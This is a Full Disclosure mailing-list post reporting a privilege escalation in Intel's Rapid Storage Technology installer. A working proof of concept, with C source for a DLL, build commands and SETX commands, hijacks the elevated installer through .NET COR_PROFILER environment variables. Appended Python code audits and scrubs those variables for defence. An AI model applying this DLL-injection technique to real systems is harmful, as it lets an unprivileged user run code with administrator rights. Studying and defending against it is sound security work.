Message-ID: <4408CBF74C73423DA378721120146045@H270>
Date: Tue, 23 Mar 2021 19:31:53 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] CVE-2018-3635 revisited: executable installers are vulnerable^WEVIL (case 60): again arbitrary code execution WITH escalation of privilege via Intel Rapid Storage Technology User Interface and Driver

Hi @ll,

more than 2 years ago I disclosed 2 vulnerabilities leading to local
escalation of privilege in the Intel® Rapid Storage Technology (Intel® RST)
User Interface and Driver: see <https://seclists.org/fulldisclosure/2018/Nov/45>
and <https://seclists.org/fulldisclosure/2018/Nov/52>

Intel fixed this vulnerability only in their executable installer.

Some time later Intel rewrote or rebuilt this installer (see
<https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memory>
for its current version 18.0.1.1138, published 10/15/2020) and incorporated
the second vulnerability.

CVSS 3.0 score:  8.2 High
CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Save the following source as sentinel.c in an arbitrary directory:

--- sentinel.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@...go.de>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";
    PROCESS_INFORMATION pi;

    if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
                      CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
                      NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return TRUE;
}
--- EOF ---

1. Start the command prompt of the 32-bit Windows Software Development Kit,
   then run the following command lines to compile sentinel.c and link it as
   sentinel.dll:

   cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c
   link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj kernel32.lib

ALTERNATIVE for steps 0 and 1:

1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and
   save it in an arbitrary directory.

2. Logon with the user account created during Windows setup.

3. Start a command prompt (unelevated!) and run the following command lines
   (replace <directory> with the pathname of the directory where you built or
   saved sentinel.dll):

   SETX.exe COR_ENABLE_PROFILING 1
   SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
   SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll

   JFTR: this is just one method to set these environment variables without
   the need to elevate!

4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and save
   it in an arbitrary directory.

5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then
   admire the console windows showing the output of WHOAMI.exe running
   elevated.

stay tuned, and FAR AWAY from vulnerable crap built by Intel
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
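The COR_ENABLE_PROFILING / COR_PROFILER / COR_PROFILER_PATH triad set by the SETX commands above is honoured by the CLR of every managed process started in that environment, the elevated installer included. As an added defender-side example (not part of Stefan Kanthak's post, nor Intel's code), the following Python inspects an environment, either a live one or the HKCU\Environment values that SETX persists, for a profiler DLL located where a standard user can write, and builds the scrubbed environment a native bootstrapper should hand to an elevated managed child. It goes slightly beyond the post by also covering the CORECLR_* names used by .NET Core; the trusted directories assume default ACLs, and the sample environment is constructed.

```python
import ntpath

# Variables that make the .NET CLR load a profiler DLL into any managed process
# started in that environment; the CORECLR_* names are the .NET Core equivalents.
CLR_PROFILER_VARS = {p + s for p in ("COR_", "CORECLR_") for s in
                     ("ENABLE_PROFILING", "PROFILER", "PROFILER_PATH",
                      "PROFILER_PATH_32", "PROFILER_PATH_64")}

# Assumption: default ACLs, i.e. a standard user cannot write below these directories.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def is_trusted_path(path):
    """True when the DLL lies below a directory only administrators can write to."""
    return ntpath.normpath(path).lower().startswith(TRUSTED_PREFIXES)


def audit_profiler_env(env):
    """Inspect an environment (live, or the HKCU\\Environment values SETX persists)
    for a profiler an elevated managed process would load.
    Returns a list of (severity, message); empty means nothing is armed."""
    env = {k.upper(): v.strip() for k, v in env.items()}  # names are case-insensitive
    findings = []
    for family in ("COR", "CORECLR"):
        # The documented enabling value is "1"; any non-zero value is treated as armed.
        if env.get(f"{family}_ENABLE_PROFILING", "0") in ("", "0"):
            continue
        paths = [env[k] for k in (f"{family}_PROFILER_PATH", f"{family}_PROFILER_PATH_32",
                                  f"{family}_PROFILER_PATH_64") if k in env]
        if not paths:  # only a CLSID: the DLL is found through the registry, check it there
            findings.append(("medium", f"{family} profiling armed via CLSID "
                                       f"{env.get(f'{family}_PROFILER', '<unset>')}"))
        for p in paths:
            findings.append(("low" if is_trusted_path(p) else "high",
                             f"{family} profiler {p} is loaded into every managed process, "
                             "elevated ones included"))
    return findings


def scrub_profiler_env(env):
    """Environment a native bootstrapper should pass to an elevated managed child:
    a copy with every profiler knob removed, whatever its value."""
    return {k: v for k, v in env.items() if k.upper() not in CLR_PROFILER_VARS}


# Constructed sample: user environment after the post's three SETX commands, DLL in a
# user-writable directory (placeholder path).
HIJACKED_ENV = {"COR_ENABLE_PROFILING": "1",
                "COR_PROFILER": "{32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}",
                "COR_PROFILER_PATH": r"C:\Users\user\Downloads\sentinel.dll",
                "Path": r"C:\Windows\System32"}
```

Because the CLR evaluates these variables before the first managed instruction runs, the check must be performed by native code or by the parent that launches the elevated process; a managed installer cannot protect itself after the fact.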